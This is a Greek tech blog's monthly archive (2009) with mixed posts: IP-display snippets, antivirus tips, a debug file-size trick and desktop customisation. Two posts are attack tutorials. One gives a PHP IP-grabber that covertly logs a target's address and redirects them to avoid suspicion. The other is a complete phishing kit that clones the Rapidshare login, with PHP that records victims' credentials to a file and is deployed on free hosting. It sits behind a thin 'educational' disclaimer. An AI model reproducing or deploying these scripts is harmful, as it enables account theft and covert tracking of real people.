Αρχείο για Σεπτεμβρίου, 2009

Εμφάνιση της IP μέσω Javascript,PHP και ASP

Posted in Προγραμματισμός with tags , , on Σεπτεμβρίου 30, 2009 by netbiosX

Αν είμαστε web developers και χρειαζόμαστε κάποιο script που να εμφανίζει την IP στον browser του κάθε χρήστη τότε οι παρακάτω κώδικες θα μας βοηθήσουν να το επιτύχουμε αυτό:

Javascript:

var ip= ‘<!–#echo var=»REMOTE_ADDR»–>’;
document.write(«Your IP Address is :»+ip+» «);

ASP:

request.ServerVariables(«REMOTE_ADDR»)

PHP:

<?php
$remote_address = getenv(«REMOTE_ADDR»);
echo «Your IP address is $remote_address.»;
$browser_type = getenv(«HTTP_USER_AGENT»);
echo «You are using $browser_type.»;
?>

Advertisements

Πώς θα βρούμε την IP διεύθυνση από κάποιον χρήστη

Posted in Χάκινγκ with tags , on Σεπτεμβρίου 30, 2009 by netbiosX

Πολλοί χρήστες έχουν αναρωτηθεί για το πως μπορούν να βρουν την IP διεύθυνση από κάποιον που κάνουνε chat ή κάποιου φίλου τους.Η παρακάτω μέθοδος θα μας δώσει την δυνατότητα λοιπόν να βρούμε την IP οποιουδήποτε χρήστη. 

Αντιγράφουμε τον παρακάτω κώδικα σε ένα αρχείο σημειωματαρείου και το σώζουμε με το όνομα ip.php (μπορούμε όμως να δώσουμε και ότι όνομα θέλουμε) και αμέσως μετά δημιουργούμε ένα νέο αρχείο σημειωματαρείου με την ονομασία ip_log.Το αρχείο ip_log είναι και αυτό που θα κρατάει τις IP διευθύνσεις.

Κώδικας: 

<?php
$ip = $_SERVER[‘REMOTE_ADDR’];
$dt = date(«l dS \of F Y h:i:s A»);
$file=fopen(«ip_log.txt»,»a»);
$data = $ip.’ ‘.$dt.»\n»;
fwrite($file, $data);
fclose($file);
header( ‘Location:
http://www.google.com’ ) ;
?>

Ανεβάζουμε τα δύο αυτά αρχεία σε κάποιο hosting που να υποστηρίζει php και δίνουμε δικαιώματα 777 στο αρχείο ip_log.txt.Τώρα το μόνο που έχουμε να κάνουμε είναι να δώσουμε το link που θα παραπέμπει στο αρχείο ip.php στο πρόσωπο που θέλουμε να μάθουμε την IP του.

Μόλις το ανοίξει η IP του θα καταγραφεί στο ip_log.txt μαζί με την ημερομηνία και την ώρα και θα κατευθυνθεί στο google.com αμέσως προκειμένου να μην υποπτευθεί τίποτα.

Πώς θα κρατήσουμε το σύστημα μας καθαρό από ιούς

Posted in Ασφάλεια with tags , , , on Σεπτεμβρίου 30, 2009 by netbiosX

Όλοι μας κάποια στιγμή έχει τύχει να κολλήσουμε κάποιον ιό και να φτάσουμε στο σημείο του format προκειμένου να τον βγάλουμε απόν το pc μας.Με ποιούς τρόπους όμως κολλάμε ιούς και πώς μπορούμε να τους κρατήσουμε μακριά από τον υπολογιστή μας?

Email

Ένας από τους πιο συνηθισμένους τρόπους που μπορεί ένας υπολογιστής να κολλήσει ιό είναι μέσω Email.Γι’αυτό θα πρέπει να αποφεύγουμε τα spam.Πώς θα το κάνουμε αυτό?Ανοίγοντας μόνο τα email που προέρχονται από την λίστα επαφών μας και αυτά που προέρχονται από προέλευση την οποία γνωρίζουμε.Ακόμη δεν θα πρέπει να κάνουμε κλικ σε links τα οποία δεν γνωρίζουμε και προέρχονται από διευθύνσεις email άγνωστες.

USB drives

Ένας άλλος τρόπος μετάδοσης των ιών είναι μέσω των usb sticks.Γι’αυτό κάθε φορά που θέλουμε να αντιγράψουμε δεδομένα από ένα usb stick θα πρέπει πρώτα να κάνουμε ένα virus scan για να είμαστε σίγουροι ότι δεν θα περιέχει κάποιον ιό.Επίσης η πιο ασφαλής μέθοδος για να ανοίξουμε το usb stick μας είναι μ δεξί κλικ και άνοιγμα και όχι με διπλό κλικ.

Internet

Όπως γνωρίζουμε το Internet είναι η κύρια πηγή πολλών κακόβουλων προγραμμάτων όπως virus,worms,trojans κτλ.Οπότε θα πρέπει καθώς κάνουμε browsing στο Internet να είμαστε ιδιαίτερα προσεκτικοί ιδιαίτερα στα παράθυρα pop ups.Πολλές φορές θα δούμε pop ups που θα μας λένε ότι κερδίσαμε κάποιο βραβείο ή διάφορα άλλα μηνύματα.Δεν θα πρέπει λοιπόν ποτέ να κάνουμε κλικ σε αυτά τα pop up και ακόμα αν έχουμε και κάποιον pop up blocker θα μας βοηθήσει να απαλλαγούμε από τα ενοχλητικά αυτά παράθυρα.

Search engines

Σχεδόν κάθε χρήστης πλέον χρησιμοποιεί τις μηχανές αναζητήσης για να εντοπίσει ιστοσελίδες.Άρα είναι προφανές ότι στα αποτελέσματα αυτών των αναζητήσεων θα βρίσκονται και κακόβουλες ιστοσελίδες.Για να αποφύγουμε λοιπόν αυτές τις ιστοσελίδες μπορούμε να κατεβάσουμε το AVG Link Scanner το οποίο είναι ένα freeware πρόγραμμα που τσεκάρει τα links προτού εισέλθουμε στην ιστοσελίδα.

Email Attachments

Δεν θα πρέπει ποτέ να ανοίγουμε attachments από email που δεν γνωρίζουμε και πάντα θα πρέπει να κάνουμε scan στο attachment πριν το κατεβάσουμε στον υπολογιστή μας.

Patches

Πάντα θα πρέπει να έχουμε το λειτουργικό μας ενημερωμένο με τα τελευταία patches καθώς και ο browser που χρησιμοποιούμε να είναι η τελευταία έκδοση και να έχει ενημερωθεί με τα τελευταία fixes.Έτσι θα κλείσουμε κάποιες τρύπες στο λογισμικό μας.

Κατέβασμα αρχείων

Όταν κατεβάζουμε αρχεία από warez forums,torrents,p2p (όπως limewire κτλ) θα πρέπει να είμαστε πολύ προσεκτικοί ειδικότερα με τα .exe αρχεία τα οποία δεν θα πρέπει να τα τρέχουμε αν δεν τα σκανάρουμε με το antivirus που διαθέτουμε.

Ιστοσελίδες με Serials και cracks

Είναι επίσης σημαντικό να μην επισκεπτόμαστε ιστοσελίδες που περιέχουν warez,serials και cracks προγραμμάτων καθότι είναι βέβαιο ότι θα περιέχουν αρκετά spywares και ιούς.

MS Outlook

Πολλοί χρήστες χρησιμοποιούν το Outlook για να πέρνουν τα email τους.Όμως το Outlook είναι ένα πρόγραμμα ευάλωτο σε worms οπότε εκτός αν έχουμε ένα πολύ αποτελεσματικό antivirus.Η καλύτερη λύση πάντως είναι να χρησιμοποιήσουμε ένα web based πρόγραμμα για να παίρνουμε τα email μας όπως hotmail,yahoo κτλ. 

Antivirus

Όσο πιο ενημερωμένο είναι ένα antivirus τόσο πιο καλύτερη ασφάλεια θα μας παρέχει.Επίσης θα πρέπει να κάνουμε και το λεγόμενο full system scan κατά διαστήματα.Ακόμη τα περισσότερα antivirus πλέον παρέχουν προστασία σε πραγματικό χρόνο αυτόματα και θα πρέπει αυτήν η δυνατότητα να είναι ενεργοποιημένη.

Antispyware

Εκτός από το antivirus θα χρειαστούμε και ένα καλό antispyware (ms antispyware,spybot) προκειμένου να έχουμε προστασία από τα spyware και malware.

Πώς δημιουργούμε ένα αρχείο στο μέγεθος που θέλουμε

Posted in Χρήσιμα with tags , , on Σεπτεμβρίου 29, 2009 by netbiosX

Ας υποθέσουμε ότι θέλουμε να δημιουργήσουμε ένα αρχείο που να έχει μέγεθος 10000kb.Το μετατρέπουμε σε bytes πολλαπλασιάζοντας με το 1024 και μας δίνει σαν αποτέλεσμα 10240000 bytes.

Ανοίγουμε την αριθμομηχανή των windows και από την προβολή επιλέγουμε επιστημονική.Πληκτρολογούμε το παραπάνω αποτέλεσμα (δηλαδή το 10240000) και το μετατρέπουμε σε HEX το αποτέλεσμα του οποίου είναι 9C4000.

Μετατρέπουμε αυτήν την τιμή σε 8ψήφια βάζοντας άλλα 2 μηδενικά μπροστά δηλαδή 009C4000.

Τώρα ανοίγουμε την γραμμή εντολών και πληκτρολογούμε debug filename.dat (μπορούμε να επιλέξουμε ότι όνομα θέλουμε και επέκταση για το αρχείο μας).

Θα μας εμφανίσει το μήνυμα file not found το οποίο και εμείς θα πρέπει να το αγνοήσουμε.

Πληκτρολογούμε RCX και πατάμε Enter και βάζουμε τα 4 τελευταία ψηφία από το 009C4000 δηλαδή το 4000.

Έπειτα πληκτρολογούμε RBX,πατάμε Enter και πληκτρολογούμε τα πρώτα 4 ψηφία δηλαδή 009C.

Τέλος πληκτρολογούμε W (write) και πατάμε Enter και μετά Q (quit) και ξανά Enter.

Παράδειγμα:

debug

Τώρα τσεκάρουμε το αρχείο με την εντολή DIR για να δούμε αν όντως έχει το μέγεθος που του ορίσαμε.Με τον ίδιο τρόπο μπορούμε να δημιουργήσουμε αρχεία όσο μεγάλα θέλουμε.

Η τεχνική του phishing

Posted in Χάκινγκ with tags , , on Σεπτεμβρίου 29, 2009 by netbiosX

Μία τεχνική του χάκινγκ που χρησιμοποιείται για κλέψιμο κωδικών και λογαριασμών είναι το Phishing.Στο συγκεκριμένο άρθρο θα αναλύσουμε την τεχνική αυτήν μέσα από ένα παράδειγμα για να δούμε πως μπορούν οι χάκερς να μας ξεγελάσουν για να κλέψουν τα account μας.

Θα χρησιμοποιήσουμε την ιστοσελίδα rapidshare.com σαν παράδειγμα για το άρθρο μας.

Πηγαίνουμε λοιπόν στο site http://www.rapidshare.com και επιλέγουμε να πάμε στην σελίδα premium zone.Εκεί κάνουμε δεξί κλικ στην σελίδα και επιλέγουμε προβολή προέλευσης.Επιλέγουμε όλο των κώδικα και τον αντιγράφουμε σε ένα έγγραφο σημειωματαρίου.

Στον κώδικα μας ενδιαφέρουν δύο λέξεις:method και action.Ψάχνουμε με την εύρεση (ctrl+F) για να βρούμε που αναφέρεται η λέξη method.Θα δούμε ότι στο αποτέλεσμα θα μας εμφανίσει method=»post» και αλλάζουμε το post με την λέξη get.

Τώρα ψάχνουμε για την λέξη action μέσα στον κώδικα και θα δούμε κάτι σαν το παρακάτω:

 action=»https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi»

Αντικαθιστούμε τον παραπάνω σύνδεσμο με το next.php δηλαδή:

action=»next.php»

Σώζουμε αυτό το αρχείο σαν index.html και τώρα θα δημιουργήσουμε την σελίδα next.php.Δημιουργούμε ένα νέο έγγραφο σημειωματαρείου και πληκτρολογούμε τον παρακάτω κώδικα:

Κώδικας:

<?php
$datum = date(‘d-m-Y / H:i:s’);
$ip = $_SERVER[‘REMOTE_ADDR’];
header(«Location: Edw vazoume to redirect url mas»);
$handle = fopen(«password.txt», «a»);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, «=»);
fwrite($handle, $value);
fwrite($handle, «\r\n»);
}
fwrite($handle, «IP: $ip | Date: $datum (Date=0 GTM)\r\n»);
fwrite($handle, «\r\n»);
fclose($handle);

setcookie («user», «empty», time()+3600);
exit;
?>

Η σελίδα next.php θα είναι και η σελίδα στην οποία θα κατευθυνθούν οι χρήστες αφότου βάλουν τις πληροφορίες λογαριασμού τους στην πρώτη σελίδα.

Στον παραπάνω κώδικα μετά από την λέξη location βάζουμε το redirect url μας το οποίο μπορεί να είναι η αυθεντική σελίδα του rapidshare ή οποιαδήποτε άλλη σελίδα επιθυμούμε εμείς να κατευθύνει τα θύματα μας αφότου βάλουν τις πληροφορίες του λογαριασμού τους.

Επιλέγουμε για το παράδειγμα μας την αυθεντική σελίδα του rapishare.Δηλαδή θα έχουμε:

header(«Location: https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi»);

Σώζουμε αυτό το αρχείο σαν next.php και τώρα δημιουργούμε ένα ακόμα έγγραφο σημειωματαρείου με την ονομασία password.txt το οποίο και θα είναι το έγγραφο στο οποίο θα αποθηκεύονται οι πληροφορίες των λογαριασμών των θυμάτων.

Πηγαίνουμε σε ένα free web hosting site που υποστηρίζει php (όπως http://www.freeweb7.com/) και αφού σιγουρευτούμε ότι έχουμε διαγράψει όλα τα default αρχεία που υπάρχουν από τον web hosting provider όπως το index.html  ανεβάζουμε τα 3 αρχεία μας (index.html,next.php,password.txt).

Τώρα πηγαίνουμε στην ιστοσελίδα που έχουμε φτιάξει την ψεύτικη και βάζουμε test στο login και test στο password για να τσεκάρουμε αν θα εμφανιστούν στο password.txt.Αν εμφανιστούν τότε σημαίνει ότι η ψεύτικη μας σελίδα δουλεύει.

Με την παραπάνω μεθοδολογία θα δουλέψει ένας phisher για να κλέψει κωδικούς.Γι’αυτό μην βάζετε ποτέ τους κωδικούς σας σε ιστοσελίδες που δεν εμπιστεύεστε και πάντα να κοιτάτε το url για να δείτε αν είναι το αυθεντικό ή κάποιο που μοιάζει με το αληθινό domain και θέλει να μας παραπλανήσει.

Σημείωση:

Το παραπάνω παράδειγμα είναι απλώς για εκπαιδευτικούς σκόπους και δεν συνίσταται η χρήση του ενάντια σε άλλους χρήστες.Το datalibrary δεν φέρει ουδεμία ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλους σκοπούς.

Πώς βάζουμε μία εικόνα σαν φόντο στο παράθυρο του usb stick

Posted in Χρήσιμα with tags , on Σεπτεμβρίου 28, 2009 by netbiosX

Αν έχετε βαρεθεί το λευκό background κάθε φορά που ανοίγετε το usb stick σας τότε μπορείτε να του ορίσετε κάποια δική σας φωτογραφία ώστε να το κάνετε πιο προσωπικό και καλύτερα εμφανίσιμο.

Ανοίγουμε λοιπόν ένα αρχείο σημειωματαρίου και κάνουμε αντιγραφή και επικόλληση των παρακάτω κώδικα:

Κώδικας:

[.ShellClassInfo]
   IconFile=%SystemRoot%\system32\SHELL32.dll
   IconIndex=127
   ConfirmFileOp=0
  
              
              [{BE098140-A513-11D0-A3A4-00C04FD706EC}]
   Attributes=1
   IconArea_Image=»your_picture.jpg»
   IconArea_Text=»0xFFFFFF»
   VeBRA sources – don’t delete the tag above, it’s there for XXXXX purposes –
   [ExtShellFolderViews]
   {BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140-A513-11D0-A3A4-00C04FD706EC}
   {5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CF-AE66-08002B2E1262}
  
   [{5984FFE0-28D4-11CF-AE66-08002B2E1262}]
   PersistMoniker=Folder.htt
   PersistMonikerPreview=%WebDir%\folder.bmp

Στην σειρά IconArea_Image αντικαθιστούμε το your_picture με το όνομα της εικόνας που θέλουμε να βάλουμε.

Το σώζουμε σαν desktop.ini και το βάζουμε μέσα στο usb μας μαζί με την εικόνα που θέλουμε σαν background.Αν το επιθυμούμε μπορούμε να τα κάνουμε και κρυφά τα δύο αυτά αρχεία.

Αποσυνδέουμε και ξανασυνδέουμε το usb stick μας και πλέον βλέπουμε ότι η εικόνα μας έχει τοποθετηθεί σαν φόντο.

Σημείωση:

Ο παραπάνω κώδικας δουλεύει μόνο για λειτουργικά XP.Στα Vista δεν υπάρχει κάτι αντίστοιχο ακόμα τουλάχιστον.

Βάζοντας μία ταινία να παίζει στο φόντο της επιφάνειας εργασίας

Posted in Χρήσιμα with tags on Σεπτεμβρίου 28, 2009 by netbiosX

Κάποιες φορές μπορεί να βλέπουμε κάποια ταινία στον υπολογιστή μας και παράλληλα να θέλουμε να κάνουμε και chat στο MSN ή κάτι άλλο χωρίς να χάσουμε κάποια σκηνή από την ταινία.

Οι χρήστες των Windows Vista Ultimate έχουν την δυνατότητα να το καταφέρουν αυτό μέσα από το Dream Scene το οποίο τους επιτρέπει να αναπαράγουν βίντεο σε όλη την επιφάνεια εργασίας τους σαν wallpaper.Τι γίνεται όμως για όλους εκείνους που δεν διαθέτουν το Windows Dream Scene?

Υπάρχουν διάφορες λύσεις.Η πιο κλασσική είναι να αρχίσουμε να αναπαράγουμε το βίντεο με τον player μας και να πατήσουμε το πλήκτρο printscreen.Μετά να ανοίξουμε την ζωγραφική (εννοείτε ότι αφήνουμε το βίντεο να παίζει στον player) και να κάνουμε επικόλληση.Θα δούμε ότι το βίντεο θα αρχίσει να παίζει στην ζωγραφική!!Σώζουμε την εικόνα σαν .jpg και την τοποθετούμε σαν Wallpaper.Το βίντεο θα παίζει πλέον εκεί.

Ένας άλλος τρόπος είναι να χρησιμοποιήσουμε το VLC player.Εφόσον το wallpaper mode είναι ενεργοποιήμενο κάνοντας δεξί κλικ πάνω στην ταινία και ενώ την αναπαράγουμε επιλέγουμε Wallpaper.Η ταινία θα παίζει πλέον στο φόντο της επιφάνειας εργασίας.

Σημείωση:

Σε μερικούς υπολογιστές η δυνατότητα του wallpaper από το vlc μπορεί να είναι απενεργοποιήμενη.Αν το έχουμε ενεργοποιήσει από τις ρυθμίσεις και παραμένει απενεργοποιημένο τότε θα πρέπει να είμαστε σίγουροι ότι έχουμε τα τελευταία drivers της κάρτας γραφικών,τελευταία έκδοση DirectX και τελευταία έκδοση του VLC.